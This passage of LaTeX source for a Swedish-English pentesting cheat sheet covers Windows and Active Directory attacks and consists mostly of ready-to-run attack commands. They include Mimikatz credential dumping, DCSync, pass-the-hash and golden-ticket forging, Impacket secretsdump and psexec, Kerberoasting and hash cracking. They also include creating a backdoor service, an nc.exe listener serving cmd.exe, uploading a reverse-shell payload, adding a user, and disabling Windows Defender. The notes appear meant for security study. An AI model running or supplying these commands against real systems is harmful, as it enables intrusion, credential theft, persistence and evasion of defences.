(f{\"o}r att bekr{\"a}fta sin roll efter elevering) \tn % Row Count 13 (+ 4) % Row 5 \SetRowColor{white} {\bf{lsadump::sam}} & Dumpa SAM \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{lsadump::dcsync}} & AD-hashar \tn % Row Count 16 (+ 2) % Row 7 \SetRowColor{white} {\bf{load mimikatz}} & K{\"o}r via metasploit \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Impacket}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{SECRETSDUMP}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Dump password hashes}}} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \seqsplit{impacket-secretsdump} & Dump NTLM hash (or use Mimikatz) \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} impacket-secretdump -sam sam -system system -security security LOCAL & Retrive password \tn % Row Count 8 (+ 4) % Row 4 \SetRowColor{LightBackground} secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL & Dump NTDS \tn % Row Count 11 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{SMBCLIENT}}} \tn % Row Count 12 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Explore download/upload files using SMB}}} \tn % Row Count 13 (+ 1) % Row 7 \SetRowColor{white} pth-smbclient.py -hashes aad3b4... \seqsplit{EXAMPLE/administrator@10}.10.10.5 & Use NTML-hash at machine \tn % Row Count 17 (+ 4) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{PSEXEC}}} \tn % Row Count 18 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Execute commands by createing a service (noisy)}}} \tn % Row Count 19 (+ 1) % Row 10 \SetRowColor{LightBackground} impacket-psexec.py -hashes \seqsplit{:aad3b435b51404eeaad3b435b51404ee} \seqsplit{EXAMPLE/Administrator@192.168.1.10} & Use NTLM hash (pass-the-hash) -\textgreater{} Remote shell \tn % Row Count 24 (+ 5) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{WMIEXEC}}} \tn % Row Count 25 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Commands using WMI. (more scilent than psexec) }}} \tn % Row Count 26 (+ 1) % Row 13 \SetRowColor{white} wmiexec.py \seqsplit{DOMAIN/user@10.0.0.5} -hashes :NTLMHASH & (PTH) Execute commands on remote-computer \tn % Row Count 29 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper (JtR)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Commands}} \{\{bb=3\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} john hash.txt & Run john against hash.txt \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} john -{}-format=krb5tgs -{}-wordlist=rockyou.txt tgt\_hash.txt & Kerberoasting \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} john -{}-format=lm hash.txt & Crack LM-hash \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} john -{}-format=nt hash.txt & Crack NT-hash \tn % Row Count 10 (+ 2) % Row 5 \SetRowColor{white} john -{}-format=netntlm hash.txt & Crack NTLMv1/Net-NTLMv1 \seqsplit{(challenge/response)} \tn % Row Count 13 (+ 3) % Row 6 \SetRowColor{LightBackground} john -{}-format=netntlmv2 hash.txt & Crack NTLMv2/Net-NTLMv2 \seqsplit{(challenge/response)} \tn % Row Count 16 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Output/Misc}} \{\{bb=3\}\}} \tn % Row Count 17 (+ 1) % Row 8 \SetRowColor{LightBackground} john.pot & File with cracked password \tn % Row Count 19 (+ 2) % Row 9 \SetRowColor{white} john.rec & store john's current status \tn % Row Count 21 (+ 2) % Row 10 \SetRowColor{LightBackground} john -{}-restore & Picks up where it left of. Based on {\bf{john.rec}} \tn % Row Count 24 (+ 3) % Row 11 \SetRowColor{white} jumbo-package & Support for additional hash types. Separate package install. Use {\bf{-{}-rules=jumbo}} \tn % Row Count 29 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{WINDOWS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{REGISTRY}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} SAM & NTLM Password passwords - Stores credentials and account information for local users. {\emph{username:RID:LM:NT.}} \tn % Row Count 7 (+ 6) % Row 2 \SetRowColor{LightBackground} Secrets & Stores recent cached login passwords of users. Stores secrets used by the Local Security Authority (LSA) \tn % Row Count 13 (+ 6) % Row 3 \SetRowColor{white} System & Stores system configuration data \tn % Row Count 15 (+ 2) % Row 4 \SetRowColor{LightBackground} Security & Stores user security policy data \tn % Row Count 17 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{PATHS}}} \tn % Row Count 18 (+ 1) % Row 6 \SetRowColor{LightBackground} HKEY\_LOCAL\_MACHINE\textbackslash{}SAM & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SAM \tn % Row Count 20 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{HKEY\_LOCAL\_MACHINE\textbackslash{}Security\textbackslash{}Policy\textbackslash{}Secrets} \tn % Row Count 21 (+ 1) % Row 8 \SetRowColor{LightBackground} HKEY\_LOCAL\_MACHINE\textbackslash{}SYSTEM & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SYSTEM \tn % Row Count 23 (+ 2) % Row 9 \SetRowColor{white} HKEY\_LOCAL\_MACHINE\textbackslash{}Security & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SECURITY \tn % Row Count 25 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{LANMAN}}} \tn % Row Count 26 (+ 1) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Old! Converted to uppercase. No salt. Divided into 7 chars-block. Maximum 14 chars. DES.}}} \tn % Row Count 28 (+ 2) % Row 12 \SetRowColor{LightBackground} AAD3B435B51404EE & Hårdkodad LANMAN padding \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows (cont)}} \tn % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{MISC}}} \tn % Row Count 1 (+ 1) % Row 14 \SetRowColor{white} \seqsplit{Administrator:500:aad3b435b51404eeaad3b435b51404ee:cd06ca7c7e10c99b1d33b7485a2ed808:::} & Exempel på rad i SAM \tn % Row Count 6 (+ 5) % Row 15 \SetRowColor{LightBackground} NT AUTHORITY\textbackslash{}SYSTEM (S-1-5-18) & Gud på en helt lokal dator. Finns inte i AD. Ingen relation till andra SYSTEM på andra datorer \tn % Row Count 11 (+ 5) % Row 16 \SetRowColor{white} NT-Hash algoritm & MD4 \tn % Row Count 12 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberostermer}} \tn % Row 0 \SetRowColor{LightBackground} Domain Controller (DC) & Controlls the AD \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} Key Distribution Center (KDC) & Serivce in DC. User authenticates with user/pass. Distribute TGT. \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} Authentication Service (AS) & Part of KDC. Authenticates. kerberos client - grants a TGT \tn % Row Count 9 (+ 3) % Row 3 \SetRowColor{white} Ticket Granting Service (TGS) & Part of KDC. Validates the TGT. Issues a ST to specific resource/service \tn % Row Count 13 (+ 4) % Row 4 \SetRowColor{LightBackground} Ticket Granting Ticket (TGT) & Proof of authentication. Given by KDC. Is then used to ask for ST (at TGS) \tn % Row Count 17 (+ 4) % Row 5 \SetRowColor{white} Service Tickets (ST) & Gives access to asked resource/service \tn % Row Count 19 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ FLÖDE }}} \tn % Row Count 20 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{1. Anv{\"a}ndaren ber om en TGT} \tn % Row Count 21 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{2. Anv{\"a}ndaren loggar in och autentiseras av KDC.} \tn % Row Count 22 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{3. KDC utf{\"a}rdar en TGT till anv{\"a}ndaren.} \tn % Row Count 23 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{4. Anv{\"a}ndaren anv{\"a}nder TGT:n f{\"o}r att beg{\"a}ra servicebiljetter från TGS f{\"o}r de tj{\"a}nster de beh{\"o}ver åtkomst till.} \tn % Row Count 26 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{5. TGS verifierar TGT:n och utf{\"a}rdar servicebiljetten.} \tn % Row Count 28 (+ 2) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{6. Anv{\"a}ndaren anv{\"a}nder servicebiljetten f{\"o}r att autentisera mot tj{\"a}nsten.} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberostermer (cont)}} \tn % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Misc}}} \tn % Row Count 1 (+ 1) % Row 14 \SetRowColor{white} NTDS.dit & Located at Domain Controller. Stores NTML, kerberos-keys etc. \tn % Row Count 5 (+ 4) % Row 15 \SetRowColor{LightBackground} DOMAIN\textbackslash{}Administrator:500:aad3...:cd06...::: & Rad i NTDS.dit \tn % Row Count 8 (+ 3) % Row 16 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Service Principal Name (SPN)}}} \tn % Row Count 9 (+ 1) % Row 17 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Finns f{\"o}r vajre tj{\"a}nst. KDC vet att vilken varje SPN {\"a}r kopplat till, f{\"o}r specifikt konto}}} \tn % Row Count 11 (+ 2) % Row 18 \SetRowColor{white} MSSQLSvc\textbackslash{}sqlserver.exampe.com:443 & Exempel på SPN \tn % Row Count 13 (+ 2) % Row 19 \SetRowColor{LightBackground} Servicekonto & AD-konto som k{\"o}r respektive tj{\"a}nst. Manuellt underhåll. \tn % Row Count 16 (+ 3) % Row 20 \SetRowColor{white} Managed Service Account (MSA) & AD-konto f{\"o}r s{\"a}ker och automatiserad tj{\"a}nstek{\"o}rning. Automatisk l{\"o}nsenordshantering. \tn % Row Count 21 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.6 cm} x{4.4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberoasting}} \tn % Row 0 \SetRowColor{LightBackground} (1) Discover SPNs & eg. with Impacket (GetUserSPN.py), \seqsplit{PowerView(Get-DomainUser)} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} (2) Request service tickets & eg. with Impacket \tn % Row Count 5 (+ 2) % Row 2 \SetRowColor{LightBackground} (3) Export service tickets & eg. with Impacket -{}-\textgreater{} \$krb5tgs\$23\$*.... \tn % Row Count 7 (+ 2) % Row 3 \SetRowColor{white} (4) Crack service tickets. & eg. with Hashcat \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ setspn }}} \tn % Row Count 10 (+ 1) % Row 5 \SetRowColor{white} {\bf{setspn -T lab.local -Q */* }} & List all SPNs in domain \tn % Row Count 12 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{SYSINTERNALS}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Övervaka processer, starta tj{\"a}nster, dumpa minne}}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{wmic ( Windows Management Instrumentation Command-line)}}} \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Samla systeminfo eller k{\"o}r kod tyst – lokalt eller fj{\"a}rr}}} \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{wmic \seqsplit{/node:"192.168.1.10"} process call create "cmd.exe /c whoami"}} & Starta kommando på fj{\"a}rrmaskin \tn % Row Count 11 (+ 4) % Row 5 \SetRowColor{white} {\bf{wmic \seqsplit{/node:targetA.hacker.lab} /user:hacker.lab\textbackslash{}admin /password:passw0rd get product name,vendor,version /format:csv }} & Lista alla installerad mjukvara med namn och version \tn % Row Count 17 (+ 6) % Row 6 \SetRowColor{LightBackground} {\bf{wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\textbackslash{}Windows\textbackslash{}\textbackslash{}" | findstr /i " "}} & Hitta tj{\"a}nster med os{\"a}kra s{\"o}kv{\"a}gar \tn % Row Count 24 (+ 7) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ SC (Service Control) }}} \tn % Row Count 25 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Skapa eller styra Windows-tj{\"a}nster f{\"o}r exekvering eller persistens}}} \tn % Row Count 27 (+ 2) % Row 9 \SetRowColor{white} {\bf{sc create backdoor binPath= "cmd.exe /k" start= auto}} & Skapa bakd{\"o}rrsservice \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 10 \SetRowColor{LightBackground} {\bf{sc create newservice binpath= "cmd.exe /k c:\textbackslash{}Windows\textbackslash{}Temp\textbackslash{}nc.exe -L -p 8080 -e cmd.exe"}} & Skapa lyssnare via nc genom persistent (/k) cmd \tn % Row Count 5 (+ 5) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{TASKLIST }}} \tn % Row Count 6 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visa alla aktiva processer}}} \tn % Row Count 7 (+ 1) % Row 13 \SetRowColor{white} {\bf{tasklist /v | findstr "svchost"}} & Hitta intressanta processer \tn % Row Count 9 (+ 2) % Row 14 \SetRowColor{LightBackground} {\bf{tasklist /fo csv /fi "username ne serviceacct"}} & Hitta processer som inte k{\"o}rs av {\emph{serviceacct. Spara till CSV}} \tn % Row Count 13 (+ 4) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ net }}} \tn % Row Count 14 (+ 1) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Hantera anv{\"a}ndare, grupper och resurser}}} \tn % Row Count 15 (+ 1) % Row 17 \SetRowColor{white} {\bf{net user bob passw0rd1234 /add}} & Add user \tn % Row Count 17 (+ 2) % Row 18 \SetRowColor{LightBackground} {\bf{net share}} & Lista alla delade mappar \tn % Row Count 19 (+ 2) % Row 19 \SetRowColor{white} {\bf{net use}} & Lista aktiva n{\"a}tverksanslutningar \tn % Row Count 21 (+ 2) % Row 20 \SetRowColor{LightBackground} {\bf{net accounts}} & Kontoplolicy (l{\"o}senor, lockout etc) \tn % Row Count 23 (+ 2) % Row 21 \SetRowColor{white} {\bf{net localgroup administrators}}* & Lista alla administ{\"o}rer (som finns i gruppen) \tn % Row Count 26 (+ 3) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ SCHTASKS }}} \tn % Row Count 27 (+ 1) % Row 23 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Skapa schemalagda tasks}}} \tn % Row Count 28 (+ 1) % Row 24 \SetRowColor{LightBackground} {\bf{schtasks /query /tn myshell}} & List task {\emph{myshell}} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 25 \SetRowColor{LightBackground} {\bf{schtasks /Create /tn myshell /tr C:\textbackslash{}users\textbackslash{}non\textbackslash{}shell.exe \textbackslash{}sc MINUTE}} & Create task {\emph{myshell}}, path to program (/tr), every minute (/sc) \tn % Row Count 4 (+ 4) % Row 26 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{PSEXEC}}} \tn % Row Count 5 (+ 1) % Row 27 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Sysinternals som låter dig k{\"o}ra kommandon på en fj{\"a}rrdator. K{\"o}r ofta som SYSTEM}}} \tn % Row Count 7 (+ 2) % Row 28 \SetRowColor{white} {\bf{psexec \textbackslash{}\textbackslash{}192.168.1.100 cmd.exe}} & Starta kommando (skal) på fj{\"a}rrdator \tn % Row Count 9 (+ 2) % Row 29 \SetRowColor{LightBackground} {\bf{psexec \textbackslash{}\textbackslash{}target -u DOMAIN\textbackslash{}admin -p Password123 cmd.exe}} & Med user/pass \tn % Row Count 12 (+ 3) % Row 30 \SetRowColor{white} {\bf{psexec \textbackslash{}\textbackslash{}target cmd.exe /c "whoami \textgreater{} C:\textbackslash{}output.txt"}} & K{\"o}r kommando utan att {\"o}ppna skal \tn % Row Count 15 (+ 3) % Row 31 \SetRowColor{LightBackground} {\bf{psexec \textbackslash{}\textbackslash{}target -c revshell.exe }} & Ladda upp och k{\"o}r payload \tn % Row Count 17 (+ 2) % Row 32 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ICACLS}}} \tn % Row Count 18 (+ 1) % Row 33 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visar och {\"a}ndrar beh{\"o}righeter på filer och mappar i Windows.}}} \tn % Row Count 20 (+ 2) % Row 34 \SetRowColor{white} {\bf{icacls C:\textbackslash{} | findstr BUILTIN\textbackslash{}Users}} & Hitta skrivbara mappar \tn % Row Count 22 (+ 2) % Row 35 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ACCESSCHK }}} \tn % Row Count 23 (+ 1) % Row 36 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visar vem som har vilka r{\"a}ttigheter till filer, mappar, tj{\"a}nster, registernycklar m.m.}}} \tn % Row Count 25 (+ 2) % Row 37 \SetRowColor{LightBackground} {\bf{accesschk.exe -d "C:\textbackslash{}Program Files\textbackslash{}MyApp"}} & Lista vilka anv{\"a}ndare som kan skriva till en mapp \tn % Row Count 28 (+ 3) % Row 38 \SetRowColor{white} {\bf{accesschk.exe -c * }} & Listar tj{\"a}nster och vem som kan starta/{\"a}ndra dessa \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 39 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{WINRM }}} \tn % Row Count 1 (+ 1) % Row 40 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Fj{\"a}rrstyrningsprotokoll som tillåter att kommandon k{\"o}rs på andra Windows-maskiner via n{\"a}tverket, ofta med PowerShell}}} \tn % Row Count 4 (+ 3) % Row 41 \SetRowColor{LightBackground} {\bf{\$s = New-PSSession -ComputerName \textless{}name\textgreater{} -Credential \textless{}lab\textbackslash{}netadmin\textgreater{}}} & Skapa session i\$s \tn % Row Count 8 (+ 4) % Row 42 \SetRowColor{white} {\bf{Invoke-Comand -ScriptBlock \{Get-Net-IPAddress\} -Session \$s}} & K{\"o}r NetIPAddress på remote via session \$s \tn % Row Count 12 (+ 4) % Row 43 \SetRowColor{LightBackground} {\bf{Enable-PSRemoting}} & Starta WinRM \tn % Row Count 14 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.2 cm} x{2.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Autentisera till en tj{\"a}nst direkt med NTLM-hash, utan att k{\"a}nna till l{\"o}senordet.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\emph{sekurlsa::pth /user:Administrator /domain:LAB \seqsplit{/ntlm:cd06ca7c7e10c99b1d33b7485a2ed808} /run:cmd.exe}} & PTH \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} Metasploit expects the fortmat LMHASH:NTHASH. & Eg. when using SMBPass \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{6.56 cm} p{1.44 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OVERPASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Anv{\"a}nd NTLM-hashen f{\"o}r att skapa en Kerberos TGT → sedan autentisera via Kerberos.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\emph{kerberos::purge }} & OPtH \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{sekurlsa::pth /user:admin /domain:test.local \seqsplit{/ntlm:cd06ca7c7e10c99b1d33b7485a2ed808} /run:cmd.exe}}} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Golden Ticket}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{En f{\"o}rfalskad Kerberos TGT som skapas med }}krbtgt{\emph{-hashen och ger fullst{\"a}ndig, obehindrad access i en dom{\"a}n — utan att fråga dom{\"a}nkontrollanten. TGT:n kan vara valid i 10 år. Kr{\"a}ver admin.}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} {\bf{lsadump::dcsync /user:krbtgt}} & H{\"a}mta {\bf{krbtgt}}-kontots NTML-hash via Mimikatz (k{\"a}rver dom{\"a}nadmin) \tn % Row Count 8 (+ 4) % Row 2 \SetRowColor{LightBackground} {\bf{kerberos::golden}} & Skapa golden-ticket med Mimikatz \tn % Row Count 10 (+ 2) % Row 3 \SetRowColor{white} {\bf{krbtgt}} & Domain account signing all requests for TGTs \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} DCSync & Attack d{\"a}r man imiterar en DC och ber AD om l{\"o}senordshashar via replikering. \tn % Row Count 16 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{To create a Golden Ticket with Mimikatz: valid user ID, domain SID, domain name, krbtgt hash, any username \newline \newline {\bf{kerberos::golden /user:SuperHacker /ID:500, /sid: \seqsplit{S-1-5-21-1326731835-146056860-2877405472} /krbtgt:\textless{}NTLM hash of krbtgt account\textgreater{} /domain:HACKEDLAB.local}}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{CMD}} \tn % Row 0 \SetRowColor{LightBackground} /c & Run and close window \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} /k & Run and keep window open \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} /q & Quiet mode \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} /d & Disable autorun \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} /s & Quote friendly mode \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} cmd.exe /k color 0a & Start window with green color, and keep it open \tn % Row Count 7 (+ 2) % Row 6 \SetRowColor{LightBackground} type & Som cat, fast i cmd \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} nslookup \seqsplit{www.example.com} & Forward lookup \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Powershell}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Execution Policy \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{powershell.exe -ExecutionPolicy Bypass -File script.ps1}} & Temor{\"a}r bypass av Execution Policy \tn % Row Count 4 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{Get-ExecutionPolicy}} & H{\"a}mta policyn \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} Restricted & Inga script får k{\"o}ras \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} RemoteSign & Lokala skript OK. Fj{\"a}rr måste vara signerade \tn % Row Count 11 (+ 3) % Row 5 \SetRowColor{white} Bypass & K{\"o}r allt utan att fråga \tn % Row Count 13 (+ 2) % Row 6 \SetRowColor{LightBackground} Unrestricted & K{\"o}r allt. Kommer få vaning om skript {\"a}r från internet. \tn % Row Count 16 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{MISC}}} \tn % Row Count 17 (+ 1) % Row 8 \SetRowColor{LightBackground} Get-ChildItem -Recurse -Path C:\textbackslash{} -Filter "{\emph{pass}}xlsx" & Hitta fil som innehåller {\emph{pass}} och filtype xlsx \tn % Row Count 20 (+ 3) % Row 9 \SetRowColor{white} Set-MpPreference \seqsplit{-DisableRealtimeMonitoring} \$true & Disable Windows Defender (real-time monitoring) \tn % Row Count 23 (+ 3) % Row 10 \SetRowColor{LightBackground} Add-MpPreference -ExclusionPath "Y:\textbackslash{}IT\textbackslash{}Security" & To ensure that specified folder is not scanned by Windows Defender \tn % Row Count 27 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.72 cm} x{5.28 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Responder}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Waiting for "incorrect" authentications, to get 